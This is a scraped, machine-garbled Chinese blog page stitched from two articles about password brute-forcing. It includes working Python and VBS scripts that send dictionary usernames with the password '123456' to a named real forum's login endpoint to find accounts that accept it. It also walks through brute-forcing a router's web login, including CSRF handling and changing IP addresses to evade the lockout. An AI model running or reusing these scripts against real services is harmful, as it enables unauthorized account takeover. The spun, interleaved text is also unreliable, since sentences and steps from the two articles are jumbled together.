Python牛刀小规模试制密码爆破

图片 1

莫非真的要本人破解二个么?算了,正好试试小编的Python水平。
python版

image

复制代码 代码如下:

在院子里面来看了1个没人用的路由器(ws860s),看起来像个黑科学和技术的玩具,就想着进去看看,到底有啥有趣的。看到后头的标签上有web分界面包车型客车地方,然后登录进去看看,发现成密码,然后作者想,路由器的密码应该都以能够reset的,然后本人就用笔戳那多少个reset键,奇迹未有发生,原来那一个reset键坏了。

#coding: gbk
import httplib, urllib

图片 2

def Check(username, password):
params = urllib.urlencode(
{‘userid’: username, ‘passwd’: password})
headers = {“Content-type”:
“application/x-www-form-urlencoded”}
conn = httplib.HTTPSConnection(“www.bdwm.net”)
conn.request(“POST”,
“/bbs/bbslog2.php”, params, headers)
res = conn.getresponse().read()
conn.close()
if res.find(“密码不正确”) != -1:
return False
elif res.find(“不设有这一个用户”) != -1:
return False
else:
return True

image

for i in open(“English.Dic”):
if Check(i.rstrip(),”123456″):
print i

图片 3

顺便也写了个VBS版的,感到相似VBS非常快,以为出标题了?

image

复制代码 代码如下:

剖析进程

Dim fso
Set fso = CreateObject(“scripting.filesystemobject”)
With fso.OpenTextFile(“English.Dic”,1)
Do Until .AtEndOfStream
id = .ReadLine
If Check(id,”123456″) Then
WScript.Echo id & vbTab &”OK”
End If
Loop
End With

抓包

Function Check(username,password)
Dim http
Set http = CreateObject(“Msxml2.XMLHTTP”)
http.open _
“POST”,”https://www.bdwm.net/bbs/bbslog2.php",False
http.setRequestHeader _
“Content-Type”,”application/x-www-form-urlencoded”
http.send “userid=” & username & “&passwd=” & password
response = AnsiToUnicode(http.responseBody)
If InStr(response,”密码不科学”) Then
Check = False
ElseIf InStr(response,”不存在那么些用户”) Then
Check = False
Else
Check = True
End If
End Function

一、张开路由的web页面:1玖2.16八.3.一,路由器重返

Function AnsiToUnicode(str)
Dim ado
Set ado = CreateObject(“adodb.stream”)
ado.Type = 1
ado.Open
ado.Write str
ado.Position = 0
ado.Type = 2
ado.Charset = “gb2312”
AnsiToUnicode = ado.ReadText
End Function

图片 4

事实申明,12345陆真是一个强硬的密码。但愿上午不曾警察大爷敲门。
原文:http://demon.tw/programming/python-a-little-trial.html

image

http://www.bkjia.com/Pythonjc/306570.htmlwww.bkjia.comtruehttp://www.bkjia.com/Pythonjc/306570.htmlTechArticle难道真的要我破解一个么?算了,正好试试我的Python水平。
python版 复制代码 代码如下: #coding: gbk import httplib, urllib def
Check(username, password)…

图片 5

image

会获得csrf和cookie和所需求的值,那几个值都要保存下来,后边会用。

二、输入用户名密码后:

图片 6

image

图片 7

image

图片 8

image

图片 9

image

三、路由器再次来到数据

图片 10

image

密码的转移方法

从上边抓包的结果来看,Password字段是因此加密的,所以假使我们要Python暴力破解,需求把那个password的变动算法找寻来。

张开web登入页面,查看源代码,找找算法

图片 11

image

图片 12

image

图片 13

image

图片 14

image

图片 15

image

在linux上改换ip地址,很简短一条命令就能够缓解:

图片 16

image

[password:bbbbbbbb];{“errorCategory”:”user_pass_err”,”csrf_param”:”FcnG919l8J7XhQsOYQEMS3WhsC2liSX”,”count”:2,”csrf_token”:”IQ/LfSZSx7gTp6VflYnZelobNSpoMy2″}

ip地址被界定,需求静观其变一分钟的提示:

[password:aaaaaaaa];{“errorCategory”:”Three_time_err”,”csrf_param”:”VKGTylVILQA9SFsTyYdpkHv8qfJPIIw”,”count”:3,”csrf_token”:”MTQLBcWQN+1DJjAP+A6xC4AUSXciBod”}

签到成功的唤起:

****[password:xxxxxxxx];{“csrf_param”:”H/DyWxogz7+2y4UfzhqddowkjH1uL04″,”csrf_token”:”MorgBb0+PNpoE8KhwBwq4OoioD2NcCs”,”errorCategory”:”ok”,”level”:2,”IsWizard”:true,”IsFirst”:true}

流程

图片 17

image

持有的数码都准备好了,下一步,就是伊始应用Python写程序了。

核心Python代码:

图片 18

image

图片 19

image

图片 20

image

图片 21

image

图片 22

image

图片 23

image

图片 24

image

图片 25

image

图片 26

image

图片 27

image

图片 28

image

图片 29

image

图片 30

image

图片 31

image

图片 32

image

怎么堤防暴力破解?

图片 33

image

图片 34

发表评论

电子邮件地址不会被公开。 必填项已用*标注

网站地图xml地图